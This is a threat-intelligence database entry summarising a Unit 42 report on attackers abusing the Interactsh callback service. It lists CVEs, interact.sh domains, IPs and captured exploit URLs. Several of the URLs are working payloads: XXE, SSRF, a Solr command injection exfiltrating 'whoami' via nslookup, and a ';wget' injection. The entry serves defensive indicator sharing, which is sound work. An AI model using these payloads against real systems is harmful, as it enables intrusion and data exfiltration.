Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Tags
Common Information
| Type | Value |
|---|---|
| UUID | 9d40c39d-98fc-4c86-98c0-14fe67e8aace |
| Fingerprint | 8f3965d1ce23b411 |
| Analysis status | DONE |
| Considered CTI value | 2 |
| Text language | |
| Published | Oct. 14, 2021, 1 p.m. |
| Added to db | Sept. 26, 2022, 9:34 a.m. |
| Last updated | Nov. 17, 2024, 11:40 p.m. |
| Headline | Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes |
| Title | Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes |
| Detected Hints/Tags/Attributes | 67/3/62 |
Source URLs
| Redirection | Url | |
|---|---|---|
| Details | Source | https://unit42.paloaltonetworks.com/exploits-interactsh/ |
URL Provider
Attributes
| Details | Type | #Events | CTI | Value |
|---|---|---|---|---|
| Details | CVE | 4 | cve-2017-9506 |
|
| Details | CVE | 3 | cve-2017-12629 |
|
| Details | CVE | 4 | cve-2019-2767 |
|
| Details | CVE | 4 | cve-2021-33544 |
|
| Details | CVE | 1 | cve-2021-32819 |
|
| Details | CVE | 1 | cve-2012-1301 |
|
| Details | CVE | 7 | cve-2018-1000600 |
|
| Details | CVE | 1 | cve-2021-27905 |
|
| Details | CVE | 9 | cve-2020-28188 |
|
| Details | CVE | 1 | cve-2018-15517 |
|
| Details | CVE | 1 | cve-2009-4223 |
|
| Details | CVE | 2 | cve-2019-18394 |
|
| Details | CVE | 2 | cve-2021-27886 |
|
| Details | CVE | 2 | cve-2020-13379 |
|
| Details | CVE | 3 | cve-2021-31755 |
|
| Details | CVE | 1 | cve-2020-28871 |
|
| Details | CVE | 6 | cve-2020-25223 |
|
| Details | CVE | 2 | cve-2020-8813 |
|
| Details | CVE | 6 | cve-2020-7247 |
|
| Details | CVE | 2 | cve-2020-15568 |
|
| Details | CVE | 1 | cve-2018-13354 |
|
| Details | CVE | 1 | cve-2018-13338 |
|
| Details | CVE | 3 | cve-2019-2616 |
|
| Details | CVE | 1 | cve-2018-16167 |
|
| Details | CVE | 2 | cve-2018-14839 |
|
| Details | CVE | 6 | cve-2016-1555 |
|
| Details | Domain | 1 | c4mqgxkyedf0000ar3d0gnkmaqayyyyyb.interact.sh |
|
| Details | Domain | 12 | interact.sh |
|
| Details | Domain | 1 | c32s61pbq16mga0vler0cdnhgbayyyyyn.interact.sh |
|
| Details | Domain | 1 | c44h3el4f1mfla5idm10crrtxqyyyjpp4.interact.sh |
|
| Details | Domain | 1 | c3uhg4emp8vt8fqq370gcd6th6ayyy4b6.interact.sh |
|
| Details | Domain | 1 | c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k.interact.sh |
|
| Details | Domain | 1 | c4bfibtmh0e03d1t5u90crcb9fayzf9dr.interact.sh |
|
| Details | File | 12 | jenkinsci.pl |
|
| Details | File | 5 | github.config |
|
| Details | File | 4 | xxe.xml |
|
| Details | File | 1206 | index.php |
|
| Details | File | 1 | krgourl.php |
|
| Details | File | 1 | feedproxy.aspx |
|
| Details | File | 61 | search.php |
|
| Details | IPv4 | 4 | 82.112.184.197 |
|
| Details | IPv4 | 1 | 138.68.184.23 |
|
| Details | IPv4 | 1 | 82.112.184.206 |
|
| Details | IPv4 | 1441 | 127.0.0.1 |
|
| Details | Url | 1 | http://ip-addr/uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=aa&state= |
|
| Details | Url | 1 | http://c44s021vkr17popa98agcrrhyneyyyd7c.interact.sh |
|
| Details | Url | 1 | http://ip-addr/securityrealm/user/admin/descriptorbyname/org.jenkinsci.plugins.github.config.githubtokencredentialscreator/createtokenbypassword?apiurl=hxxp://c4b14uqjfg5t9muoh3pgcrca3hoyfrbcr.interact.sh |
|
| Details | Url | 1 | http://ip-addr/xmlpserver/convert?xml=<?xml+version="1.0"+?><!doctype+r+[<!element+r+any+><!entity+%+sp+system+"hxxp://c38r5fq23aksk1ma690gcdmc6doyyahck.interact.sh/xxe.xml |
|
| Details | Url | 1 | http://ip-addr/solr/select?qt=/config#&&shards=127.0.0.1:8984/solq&stream.body={"add-listener":{"event":"postcommit","name":"nuclei","class":"solr.runexecutablelistener","exe":"sh","dir":"/bin/","args":["-c","$@|sh",".","echo","nslookup","$(whoami).c38at9vk6tb1j2mah7i0cdeca5yyybucs.interact.sh |
|
| Details | Url | 1 | http://c3167tzyedf0000sfc2ggbo7zoeyyyyyp.interact.sh/solr/gettingstarted/upload?stream.body |
|
| Details | Url | 1 | http://ip-addr/solr/db/replication?command=fetchindex&masterurl=hxxp://c3167tzyedf0000sfc2ggboug8cyyyyyb.interact.sh:80/xxxx |
|
| Details | Url | 1 | http://ip-addr/plugins/servlet/oauth/users/icon-uri?consumeruri=hxxp://c33mg9s2ndhfbpsj7legcddsomayyyypg.interact.sh |
|
| Details | Url | 1 | http://ip-addr/index.php/system/mailconnect/host/c4b14uqjfg5t9muoh3pgcrqz7oyykqcuq.interact.sh/port/80/secure |
|
| Details | Url | 1 | http://c44h3el4f1mfla5idm10crrtxqyyyjpp4.interact.sh |
|
| Details | Url | 1 | http://ip-addr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze.interact.sh |
|
| Details | Url | 1 | http://ip-addr/adm/krgourl.php?document_root=hxxp://c45luqovk0lir2vett1gcrf4iyayy468g.interact.sh |
|
| Details | Url | 1 | http://ip-addr/umbraco/feedproxy.aspx?url=hxxp://c3qsfdg4hl24te8g7rc0cd9erqyygmui6.interact.sh |
|
| Details | Url | 1 | http://ip-addr/getfavicon?host=hxxp://c3uhg4emp8vt8fqq370gcd6th6ayyy4b6.interact.sh |
|
| Details | Url | 1 | http://ip-addr/rest/sharelinks/1.0/link?url=hxxps://c37e7sraa1psb1c2nso0cd8o9eyyyn94w.interact.sh |
|
| Details | Url | 1 | http://ip-addr/search.php?search=";wget+hxxp://c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k.interact.sh |
|
| Details | Url | 1 | http://ip-addr/index.php?plot= |
|
| Details | Url | 1 | http://c4bfibtmh0e03d1t5u90crcb9fayzf9dr.interact.sh |